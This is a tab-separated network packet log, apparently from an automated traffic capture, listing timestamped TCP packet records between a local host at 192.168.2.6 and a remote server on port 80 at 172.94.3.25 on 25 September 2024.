Sep 25, 2024 16:03:26.433985949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434005976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434019089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434024096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.434024096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.434029102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434087992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434098005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434114933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434128046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434139013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434150934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434153080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.434153080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.434153080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.434161901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434211016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.434221983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.439374924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.439374924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.439376116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.517386913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517435074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517446995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517461061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517482042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517493963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517504930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517518044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517529964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517543077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517554045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517568111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.517570972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.517570972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.518013954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.518013954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.590619087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590707064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590758085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.590768099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590780973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590831995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.590842009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590862036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590882063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590897083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590900898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.590909958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590920925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590934038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.590990067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.590990067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.591043949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.591101885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.591113091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.591134071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.591145039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.591177940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.591177940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.591229916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669111013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669166088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669177055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669189930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669254065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669329882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669400930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669406891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669419050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669430017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669464111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669473886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669529915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669539928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669569016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669569016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669569016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.669755936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669768095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669780016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669790983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.669804096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.670600891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.670600891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.670600891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.718158007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748032093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748048067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748065948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748078108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748089075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748102903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748115063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748121023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748131037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748163939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748176098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748187065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748193979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748193979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748193979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748193979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748198032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.748228073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.748356104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.757842064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.757884979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.757930040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.815361023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826378107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826411963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826425076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826472044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826483011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826494932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826505899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826514959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826514959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826538086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826549053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826581955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826594114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826605082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826653957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826653957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826653957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826653957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.826685905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826695919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.826708078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.827362061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.875365019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.904819012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904872894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904885054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904900074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904916048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.904917955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904957056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904968023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904984951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.904992104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905066013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905083895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.905083895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.905085087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905085087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.905128956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905241966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905251026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905260086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.905260086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.905261040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905282021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.905292034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:26.906299114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:26.906299114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.786717892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786787987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786807060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786818981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786838055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786851883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786861897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786874056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786900043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.786933899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786943913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786955118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786966085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786978006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.786992073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.786992073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.787058115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.787441969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.787852049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788151979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788162947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788173914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788184881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788187981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788196087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788206100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788217068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788230896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788237095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788237095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788252115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788261890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788273096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788280964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788280964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788284063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788295031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788305998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788316965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788321972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788328886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788340092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788358927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788358927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788424015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788753986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788803101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788814068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788839102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788873911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788883924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788896084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788907051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788918018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788923025 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788923025 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.788928032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.788958073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.789021015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789031029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789050102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789060116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.789060116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789072037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789083004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.789107084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.789107084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.789139032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795088053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795099020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795109987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795170069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795425892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795471907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795483112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795526981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795530081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795536995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795547962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795566082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795578003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795587063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795598030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795614958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795614958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795694113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795702934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.795737028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.795737028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.804339886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.804351091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.804419994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.874156952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874234915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874270916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874371052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874443054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874475956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874511003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.874576092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.874608040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874643087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874676943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874711037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874725103 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.874764919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874799013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.874893904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.879416943 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.883172035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.883255959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.883479118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.951334953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951351881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951365948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951497078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951536894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951539993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.951539993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.951577902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951586962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951617002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951639891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.951643944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951653957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951663971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.951685905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.951685905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.952164888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952177048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952189922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952205896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.952301025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952311993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952325106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:28.952344894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.952344894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:28.999248028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.029768944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.029793024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.029803991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.029865026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.030827999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030838966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030850887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030864000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030875921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030886889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030886889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.030900002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.030940056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.030940056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.040726900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.040740013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.040797949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.108239889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108270884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108283997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108333111 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.108658075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108669043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108683109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108716011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108726978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108736038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.108736038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.108740091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108752012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.108779907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.108779907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.118180990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.118192911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.118248940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187031031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187058926 CEST	80	49715	172.94.3.25	192.168.2.6
